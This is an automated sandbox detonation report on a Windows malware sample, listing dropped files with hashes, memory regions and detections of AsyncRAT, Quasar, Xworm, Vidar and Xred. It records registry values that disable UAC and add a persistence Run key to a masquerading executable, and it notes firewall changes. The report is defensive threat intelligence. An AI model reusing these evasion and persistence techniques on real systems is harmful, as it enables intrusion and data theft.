SHA256 1a9dc2fbfe2257278e6452872cdbd18c50bf5c7142dd04c772f1633a7f20fd0d
SHA512 3b9e734d09e8f01751d370aaff2cbe68ecaf18ec78ef6cc97974ff1ab8c5fe8db2b8b942e86b4b15e8f2657f5f5141088ca0cbe5b845b878732d3bed521aa0b7

memory/3376-2706-0x0000000001F30000-0x0000000001F40000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84I4P9TMI6MI20UPKXE0.temp

MD5 6a482f21c87bb3bf147f5226ab020c9e
SHA1 fc2b85e24bedeb5048b6b6e8ef25a50a21dfd08d
SHA256 b4a898451fe37a1b92b8152e7016eb74b1e56c29ca67710d0c6f85ad421707c8
SHA512 f98176fa8c5fc431bec562568f70c0aa1886ba170b8310ac4c4022b4519a77d99e349fd252f8b70a836f8bb389dfd300e8ef8bf475ca11f741e0e4a9a9fcbf55

C:\Users\Admin\AppData\Local\Temp\AclqLgFB8I0B.bat

MD5 c7f17ca2d073986dd1c2c6d3b289f6d7
SHA1 a1720ea6cad3abf29d5a5dc9e1fe9fa3086c6923
SHA256 eaf00b260c1f1c5447b8334602e437549fec86a4b332dcb489b539c3a1d1400a
SHA512 f432d1d3aea46f7a38bd8e9dce914a751c8eea086c0d887b16de8dd23c7df67e9e04a61c0c257fc89ec2ec8556f6dc519834a127096afee2852de7d8cb7b9373

memory/4572-2745-0x000000001B570000-0x000000001B852000-memory.dmp

memory/4572-2747-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HJ9EWK04CP4K245DCTGW.temp

MD5 f85e951852a2477565b0a137ed37052d
SHA1 acc84e27b34c22e0125c27004cab88e2447f388c
SHA256 bc8790b2072d081cdd3e914f800f27aac7333f409555346ced3e55f8cec3c7da
SHA512 6cd2a46392a877a7387b978e5283e5a99a0d1e572e253df23d30fc99c3383db6794c36661ec2db3a63c14e1744bb3aecdfa6933ede1957c5106d05fcb1061bd0

memory/3320-2786-0x0000000000240000-0x0000000000258000-memory.dmp

memory/3320-2785-0x0000000000240000-0x0000000000258000-memory.dmp

memory/3320-2787-0x0000000000F60000-0x0000000000FEC000-memory.dmp

memory/3320-2789-0x0000000003C40000-0x0000000003DEA000-memory.dmp

memory/3156-2788-0x000000001B620000-0x000000001B902000-memory.dmp

memory/3156-2790-0x0000000002870000-0x0000000002878000-memory.dmp

memory/2584-2812-0x000000001B670000-0x000000001B952000-memory.dmp

C:\Config.Msi\f7703e9.rbs

MD5 911f0850afbfe0d2e6cc412072b39149
SHA1 f28f3dacbc9987c035b3ff3994b940d5880b7964
SHA256 285280254eadee754267c645e790b195fec0d56a8c59fe06dab9b731338ee9f8
SHA512 6d6610e3a4e206082734b721e94510daba3f00e50d3dbd015dff6ba78402db26a362d124e0a6acf3fe6c9a0f695951ad62c81a5cfdc69986300efe2788641eed

memory/3320-2845-0x0000000000AC0000-0x0000000000AF6000-memory.dmp

memory/3320-2846-0x0000000000E20000-0x0000000000E61000-memory.dmp

memory/3320-2847-0x0000000003330000-0x0000000003402000-memory.dmp

memory/1784-2849-0x00000000003B0000-0x00000000003E6000-memory.dmp

memory/1784-2848-0x0000000000880000-0x0000000000916000-memory.dmp

memory/1784-2852-0x0000000001FB0000-0x000000000203C000-memory.dmp

memory/1784-2853-0x000000001B320000-0x000000001B4CA000-memory.dmp

memory/1784-2854-0x0000000000410000-0x0000000000428000-memory.dmp

memory/1784-2855-0x0000000000550000-0x0000000000568000-memory.dmp

C:\Users\Admin\AppData\Roaming\Network.exe

MD5 31c81fac210cd56abb84ff55ede0365b
SHA1 ca8a86da38e111f01ad04c9c537162be2af5f842
SHA256 f26dcdf460a3da96cedebca9baccca6947bea8f89e3a801118b9cd40da14bfa8
SHA512 11d21b79a689a3689470e975d25247639c9a0eba266f70c8d5168b94a06975dc98537206cf753f9a436ee679969a9820f6ffa63fb15852ca05cf0fdf8fdf6eba

memory/3264-2888-0x0000000000D60000-0x0000000001084000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat

MD5 660b0065748fe582165dbe286a98f454
SHA1 80eefb00aecdbfa5a60dee59c49162c0f54f9beb
SHA256 8c3cd7e30528b83cf3cfce9a330f49f60aaf4e5ead092a638373f98f0d647747
SHA512 7f740bef70db167b0c96afef669106dc76d22cc60dbe8476fc8732dc7ef1bd34c99239a4efbd778241351e594f676c1c23f0e5a2d783200b1dde6d00f3fb696b

memory/3088-2902-0x0000000000160000-0x000000000019C000-memory.dmp

memory/3088-2901-0x00000000010E0000-0x00000000011E6000-memory.dmp

memory/3088-2903-0x00000000001A0000-0x00000000001B0000-memory.dmp

memory/3088-2904-0x00000000004A0000-0x00000000004D0000-memory.dmp

memory/3088-2905-0x000000001AD70000-0x000000001AE20000-memory.dmp

C:\Users\Admin\AppData\Roaming\soniC\logs.dat

MD5 83a7c07cd696ea13b0724eedfe0a1ca4
SHA1 b3998121b1edf746f2e29ea5cf758cb54b4b2f05
SHA256 7571c1f97df8e2b3a1a8fb5a686cb6511620a50114330eeed3546a6d31bd107f
SHA512 a30ed893fc46ceab521fbcb6995b0ad4a6239bdfcf3d91ab6f8504acbe6f9f1bf5b70eae3570cf1b2ca110fa3a2caadd2d8f2784d2e874480714b0d15c4c62a1

C:\Users\Admin\AppData\Local\Temp\a\mod.exe

MD5 e9987ac76debe4d7c754f30cec95d618
SHA1 7678e6011456d26f579c7dcdd238ff651cfa4edd
SHA256 56510920355a5531d174cb55ebe86f4b0d85c748d0e15dd78849a29f0f3763d1
SHA512 919003b30226a8cc81540f652ae51301641325516a5d9bbba140b293b3b97141fbd9274a2f1e942b75e618f57d6e02799e488b36f2cdcbc35f48cc9cc5594771

C:\Users\Admin\AppData\Local\Temp\a\Server.exe

MD5 25443271763910e38d74296d29f48071
SHA1 269a7dd9ff1d0076a65630715f5bd4600a33bb0d
SHA256 3bf2449588aaea6f7b7f984af24bd889ee438bb33d9331f5990ef9b6184695e8
SHA512 185d233076e4727bf1471f579e2fb56725e30a1f1d4b1f70c8da03d389f41d879eba3731f6daedb34edb8c073df90ca3c0df19362f7b174c72bd6a1251d67aea

memory/4500-2925-0x00000000000B0000-0x00000000003D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\jij.exe

MD5 170766dd706bef08f2d36bb530ea2ac6
SHA1 eadac1229aab8aa35b88982010bb3b7af3fd8537
SHA256 b11ef309a0b65e448d06275293b125714f6a9a796eed61aba45b70eca4ec9176
SHA512 9f35ea79804cc478a011c3397a00847c6a93569d7a3913a7674c53b62a516c14bf5aab1250fc68bc310016cb744f0f247f5b1019b5fb9c6388688f5f35e0b187

C:\Users\Admin\AppData\Roaming\app

MD5 5014379cf5fa31db8a73d68d6353a145
SHA1 2a1a5138e8c9e7547caae1c9fb223afbf714ed00
SHA256 538b830838cbf62e6ce267b48e2eb165030686e5b6317f0b1e9205a3e08c73b8
SHA512 5091a16ef7730449601a70b5ef5512a93c98c76beb8cfee1adc9d39780c49b1d712e764720b04e44e18c7b08633c5d453793462c18dc6bef14d82bf69892e18f

C:\Windows\System32\Windows Shell Interactive.exe

MD5 aad11067aa90b9d96958aae378c45747
SHA1 13dc757a06a092ab0ef34482c307604a67fd74b9
SHA256 2787d416bf228915debc5d9c9e058cc246f8da7217c706d8a1fe0cb788a9155b
SHA512 8a2fc9cfc72b7f9fb0ff54292022d738013813f222ebe3d7e54f1d916a6307d7652a5f4276d38550e6c515e637358b039a3f784e70a187e2d754b60eaff26813

memory/4520-2943-0x0000000001380000-0x00000000016A4000-memory.dmp

memory/2044-2948-0x0000000000080000-0x0000000000096000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csGMovlsCz1U.bat

MD5 5535f86af6f01799056c73acf479c36a
SHA1 417083fa2d4df6806d984f499cdd4f8cf7102207
SHA256 57c08f6bc6fa0b81076a9358dd8dfbe25a918bf5468dc644485b2b31b017f75e
SHA512 69c0f976f6c433c0c6bd74433b7ba237ad5c8248106f1949e1ed346422bcd0fde35740529e0ff980f1b7fe7b607c030e1e966af2817174b79e595fcd919b33ee

memory/1660-2957-0x0000000001380000-0x00000000016A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat

MD5 050b65097d99a3384c91a3af92db83bf
SHA1 f893cd87ffc2acff72c96e655921a9c605d202b5
SHA256 949dedc5efb8ecbe51410825b272d12bcfff290ebae6449852606241f77f5bea
SHA512 9d6fd460d605190691483ac3f773f45c99f80ac80d51c1b92891740776c0fcf169ad67c39c42df69f8b357a78ce76b9bfa40017a610b1c0eca6f5a9b7fd7ddf7

C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat

MD5 2f75915dee93570da94a915b57f00428
SHA1 d91660e7f70a9dd38223a628be9827a882571780
SHA256 e31fc98f93e073348edd07d12608edffc6dcdf1c840f24e9b8e127879e540de9
SHA512 0cb716b97e9902837978893c2fdfc618a64749bbbbcf7164e1bd6ae9f7bfea656ae8a2e2fa62b171916835ae02854e75f140ae557a3f050fd8bd8a448e0b8225

C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat

MD5 8efd953620b528235f220e6bd7ef6b18
SHA1 e4fe30029e355c2a1f815c88e339882c4acbae70
SHA256 eb6696427f2fe07cdae5519bd557359dc8c1843b006c8cfabbd9471a6064efa1
SHA512 dbf7c6437d9acc3afa9bce5dc220a49a7a8fd36c0f1de734ec67b95f33eda2c8dc8c74b0dbaec18faa5da799d1a7dd6ecb634d2351b633376b783488d802abfa

memory/4704-3139-0x0000000000150000-0x000000000018E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat

MD5 e786756be477a5d970f1250113955a4c
SHA1 fadd264327514db5f6da8c42d2cc4680fecf90a3
SHA256 fd302fa9911e7e63c71868961ec83de51efcb5c745a311dd9640f59690215e4d
SHA512 dfd6af7dd6c7018a73406239d62959f616fbc2658e7f2a345dac3143ea93bd794faaa20ec79915cfcd7d4524b1e4a55585bdfa7e6754ff49c337c4ef47e9ec6f

C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat

MD5 eb75a66aba873ae314915140c48db01d
SHA1 e77d18374530a30a5d068ddf887806602e7d6bc4
SHA256 256bf7b5c70028d7db9bcbd49f6418a6c8fabf1d783c182e56284555e0541147
SHA512 2322f8d4b6db7bcdb3028d33054289e6bbcf8ec2b52ddc198ae4d26cb31204f6050a97538094e0d95ccf53acef12c96cfcc5d00f376dcfc59d1846839f8456ae

C:\Users\Admin\AppData\Local\Temp\melt.txt

MD5 298802dff6aa26d4fb941c7ccf5c0849
SHA1 11e518ca3409f1863ebc2d3f1be9fb701bad52c0
SHA256 df99fdbdf7b92b29b1bf1ca4283b4de2e04643b9739d2d1089ab5808e8e5665d
SHA512 0301017dfef1b74855d6535f3fd542257689479cb933c2e8742b5b6b94e26107fa38e7fc21bdb83d45184750eced344856092330fb30a1ebbc24b2b9004c8946

C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat

MD5 fbfd9369aace198ef80b9fdeab6864b3
SHA1 a0c9ad74b50e8b23be26d313953116d324e57bcd
SHA256 89690b44c9c1e557b1d1d37473894d3fb4489cc737a41d96d4aedf94162b675c
SHA512 54c7ae58f62aa7706ad45753b5c485a3152693c9fbfec8ff215f590e39f19eaf1931721b27239689fb8b696f0b8f8adc966c9f2a17bd1b36e4e7320c60aa8e1f

memory/536-3331-0x0000000000250000-0x0000000000574000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat

MD5 67b80a39054528fc4f026dbc891309c6
SHA1 b61c2e7258ef908bb971fa1edcffc7049502a408
SHA256 7e058173e15dcff6e2afe27553178dcfd5c539f7f1af932fb9a1a66148d0d403
SHA512 a7ea28e7455ea91be65c29ca4563d1cc5c0c8ef177c76bc76133fcc8d41a4b9aab43952066e7f58d9dcd7d95d6e259da1a124f3749d45d9647b78267daca7890

C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat

MD5 13dfac99595ee08f5a0806cd54de0cf2
SHA1 8d847d07450fdd0c2888cb9d3d288f8a79f73ddb
SHA256 6682e60ed1ed0509e6848842d0c36a5ab3fcf7c2d14cbb66d9862b1f24b0fb57
SHA512 a5b137e6e8a26d28613734d1d106754a56f0a5b8014b7aa14d585887c630619fbab2c3de20be631c26510bfd6c6f7ba8e4cb22490c29d5b7b10d722fbf7a6347

memory/2012-3427-0x0000000000D00000-0x0000000001024000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat

MD5 a59a3e74231a568fcb1e6b2924be89f4
SHA1 1f2bad01b6abd0038746980e9ec6c3fb599a50ee
SHA256 7ebd19c7178b08a4f74576f1f57dc4ce3b69aecafe48186561480ccfaeec825f
SHA512 09b7f572da9396accb7432e2c43b17da1c32c3661b2e6af78d26b935ba7e490ff32c5e360bcf08bec367474059956f94c7d1809b6cc2862ab60347628ba33435

C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat

MD5 691c4e0f2823309525711935d3e9d1da
SHA1 07ffbd5095feca40ace6d835e829332a07cebde3
SHA256 457d4cf25cf8b7327f57feb1485a62a308be943a56b1c44e5e97cc4056be091d
SHA512 d4b22625fc7d807a32a2fcc2dcfb4d0ad3fa462c0a5ba4668948ca2ca15f17ae3985a0c429c18bc441b5be9a9681f7ef31510a0d30c80c82b3a331396fa158f7

memory/3108-3495-0x0000000001300000-0x0000000001624000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat

MD5 813ad27351c64cd255419e999e39194b
SHA1 ae5f8741732626d3859c06eac54ba58a14d3525b
SHA256 05dc9d7d5eb94d8660ca6717be223c949196e7d343177193af6f5de1dd83620d
SHA512 ae4152e5c9b5b06d1061a11a568218f8e48009a7363f2b6816c2693164c59f509a7827a22603e9cc8f2026ac97700cea5fe3caba4ff0f92d7a60d7a121f46b5e

memory/3112-3551-0x0000000000900000-0x0000000000C24000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 5da0a355dcd44b29fdd27a5eba904d8d
SHA1 1099e489937a644376653ab4b5921da9527f50a9
SHA256 e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f
SHA512 289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6

memory/5084-3562-0x0000000000810000-0x0000000000B34000-memory.dmp

memory/4956-3612-0x00000000008A0000-0x0000000000BC4000-memory.dmp

C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe

MD5 d4a776ea55e24d3124a6e0759fb0ac44
SHA1 f5932d234baccc992ca910ff12044e8965229852
SHA256 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c
SHA512 ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b

memory/4644-3616-0x00000000008E0000-0x0000000000C04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat

MD5 9f90cd2f71eb081ca49723618b590f48
SHA1 f5979dd693e29674534363991a5c81ee72a360a4
SHA256 ee42c816740cd2041c7fe0468f7428fd867c1fc52385c1fa6678e4344c295fc0
SHA512 e888bbabb997c7c1a7a9a129b52e945721a4b21a90fd2ff9213518d556a46c8086e4489d333fd39a4db2e900444c65bb4e86e47f5b6f4d11036ac2b29654a4c3

C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat

MD5 173ecaead14c1fb024d5ad0931a16c12
SHA1 0ba26e25c07445743eb3007465d2f6ad3dffc277
SHA256 422b69910e2f28aef577e7692d0c37a95483275b5231bbae845404c1e787eb9e
SHA512 6c4988dfbc3ab9477b1be1d3362ba79b0a141f7e7a19c967b86e8c95f9ecd65775f30ef78892cec4bd660ae850fc65749aaabd4a126ed71019b601214e7834af

memory/888-3677-0x0000000000130000-0x0000000000150000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat

MD5 8d1a743f270c76527479866fa8fdf02f
SHA1 db51256fd48ea3021753219dc116f8ec89cbda86
SHA256 11df1786f3d18fcb202d46f3ad8ad47e765692dc49dee4efe11b62b6f8c9310c
SHA512 dd7635ddbe2c365e8c2cc0fb4486d270fa5892f6d6ff455c9f7d920ec221cb66f0f4ea88e19c85ee34ce2d5310c6c4ca4a649fdf14b41a30f92f56d81f14ae9f

memory/2320-3729-0x0000000000AE0000-0x0000000000E04000-memory.dmp

memory/3440-3763-0x0000000000F60000-0x0000000000F9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat

MD5 a55c1246884622d2d569fc00a60e3e19
SHA1 97107e929bbe8601229093e5bbff64dac1123b07
SHA256 778c5bd282e7813255e67d8788f485086a451b8157f982f16a978c51bf93b190
SHA512 15667d4f0807e0a4f1a52bc5422fedc7184075437cf7b1aeaba8f0174838fa4cb0d1c1dc701c1849f9662363a89640cc5d1ac75d85763230e196c0671de0de01

C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat

MD5 bf3b4a3303d4e4271526b7f22f733671
SHA1 99ef51352cbd51e9823c19f4c4ecacf9646c74a9
SHA256 f11f3c82c646b1cfa86729a7e0d5998d5e0c860da226f475f84dd188d8dffd9d
SHA512 930c928874bef20a0275d34918b03c49ae3bd2f2d1ce20ef60778798b2785d5d634ce01b9d054ed32e4dbae7e9769b17469d67b33ddc8ab4e2382b5d6e91c256

memory/4396-3794-0x0000000000990000-0x00000000009A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat

MD5 0e4d3ee1393415299bffefbf16449903
SHA1 26f7be2f645c6ef728a975a07a2e9d119979af38
SHA256 fef1fb06c66f5c08ae32ed88638c0554db6b35b5c992b21b3748f464845879ce
SHA512 389c6ff94d4496014cad80ed91f80e647ebd22fb2b690900bf5c7a19b0050a6d110bb616aea602d526713eb89957ea84f52c5ab1a2bb12b54ddcac6e0378b7ae

memory/3160-3808-0x00000000009F0000-0x0000000000A76000-memory.dmp

C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe

MD5 4e7b96fe3160ff171e8e334c66c3205c
SHA1 ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f
SHA256 e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c
SHA512 2e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48

memory/1096-3853-0x0000000001390000-0x0000000001416000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat

MD5 92d0437f9ef305acfb2e37cf61ab4299
SHA1 961cb6a196f31cb251b41c48c59e5b9ac8ac4940
SHA256 f2933fdc2daebf7b66b1aa76e083a7adb849dc87c2fcd765badd8da39d0c364a
SHA512 a6ad8adb5ed7ddb91e6209c7cefb5733dd97aae1b77dac05401c90b003669b7e798bddd8cd0a84a236965807a6c4da7137e68fe6e1f46111750003188fe5c284

memory/484-3867-0x0000000001170000-0x0000000001494000-memory.dmp

memory/1244-3868-0x0000000001120000-0x0000000001444000-memory.dmp

C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe

MD5 ff8c68c60f122eb7f8473106d4bcf26c
SHA1 0efa03e7412e7e15868c93604372d2b2e6b80662
SHA256 5ff2becf2c56500cb71898f661c863e647a96af33db38d84d7921dc7dbf4f642
SHA512 ab92ef844a015c3fcbfba313872b922bff54184b25623ed34f4829bd66a95af081cdeefd35425a4d3b9d9085ccf8c25045cf6093d74a5c8c35012c1b7546688e

memory/3752-3874-0x0000000000370000-0x0000000000694000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat

MD5 cc0d7311ca2149f60e102772e1cdf151
SHA1 6fa746c971c5533982a04aa10b23d9a4450d7224
SHA256 70adf156f70b573664323edc9d5c4a14c925c33685842d78a5a962dc08d8ca93
SHA512 1c83bd1edf56f3f01c96bb9559bfaaf476fc630407b00d3a91c0aa6f4ba6c095c040faac0c07c2e1dc2272dea436e84484fb042a9e45bd86b4eb0e800feb9538

C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat

MD5 de135cfab7f87be50527bc285b7e66ec
SHA1 99e2629402f10f6dbe960b14fc823e831774e72a
SHA256 d3e3cb66142ffa4dc11703fec9d15bb64c1d6aeca6cd6232470c5daa27acd230
SHA512 23d86cf0bbc4b0fa2e5648f83fdaff7be0ca5a0b92cabe41aad1dc560bb223ece725fd8d9a3ab469ac20aebe3e0c398ebc9e6b94e3e9597e5947205344fd5606

C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat

MD5 e47d6cfe6efa4613c51c12e6a70e1b9d
SHA1 efde6d054092a6316e8ce83de227f574b1a5e027
SHA256 c0a06c0c32457e2ffa7499a3fa6f769f765ab5c72db8a8b806ddee412806e356
SHA512 c3769fec0b94c8dc04e648e0a4825cff8d63df1d0a5eedf1af55e23f736485ed8f13fe2dce3d9e4294ab147c5c3106f1bd6fbdb8def04037b7dc82b52a8de888

C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe

MD5 991e707e324731f86a43900e34070808
SHA1 5b5afd8cecb865de3341510f38d217f47490eead
SHA256 32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153
SHA512 07411dffbc6beff08a901afa8db3af4bc7d214407f7b20a8570e16b3900f512ad8ee2d04e31bb9d870585b9825e9102078f6c40eb6df292f09fffe57eea37f79

memory/3780-3953-0x0000000000240000-0x000000000024E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe

MD5 0076324b407d0783137badc7600327a1
SHA1 29e6cb1f18a43b8e293539d50272898a8befa341
SHA256 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583
SHA512 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4

memory/2664-3969-0x0000000000800000-0x0000000000812000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat

MD5 d16ea7346ed37c055a4a03311b659f56
SHA1 fe6db9db72b7e04f0de9db2dc2ffdefcad8df826
SHA256 ebdd57723f85a59ac828e58d5f4ca4206c3fa014afd435465b2f988b892bb8d5
SHA512 480002fba1f1f429380b2a7c81f26a1226e46a492af103f7af12a2a8c7495f879be27a6bd850e9799e221e19be82bb2b8a84d2388e8d2c372b71d93c9dc90d77

memory/948-4015-0x0000000000FE0000-0x0000000001304000-memory.dmp

memory/4340-4028-0x00000000013B0000-0x00000000016D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat

MD5 fe752131e279b994b7207b3f5d4a3767
SHA1 1653cfe79b68844de3bbc7812b2a42f61b42f5d9
SHA256 2451595911d8e9aef23573afe78cc2fb78acea35420d7f36b8aea9a12a78a03d
SHA512 f24fe7a679b9f14b7d4e6684e13ec2a80c5406f8471261dffef2a373756ddc33e9a3a7f377993f0683916a713f638a75cf3d064b54643b226c439bb37176f1d2

C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat

MD5 5629f59329611f37428fa42124d79d80
SHA1 16776c1fcf26abcba43d81dfb5c10953fb4429ce
SHA256 16ed3860e2ab444cd9ad1b687650e99c570ab836a405fb3517cd5c0016a17c93
SHA512 106c512573c3b5e93e091812f94afadf7a1d92a2f22505a1e2f273b92a4309f6ab94e5e792a99dec8ec0e728d2a4220dc4f974effd5723e320d74f5219f6b7a7

C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat

MD5 9ac77a50aafb7fbf78bfbc0f978be6c9
SHA1 ba0f1146d9727bb299eac05eb51474df81594ce6
SHA256 f0ed61ae18a9a4af3898eda4272bd5f21b04ce9d3771284061ff927d9b5427c0
SHA512 061ebea055dfb993b90a35b5f8fcaa9ed8ff2656188181ebbd5741bb673989388ee3c554caa2749fad513ccd68a6d5aa5f5f4999e2129d6f7127df2577bede96

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-26 00:01

Reported

2025-01-26 00:04

Platform

win10v2004-20241007-en

Max time kernel

15s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Vidar

stealer vidar

Vidar family

vidar

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\ProgramData\Synaptics\Synaptics.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
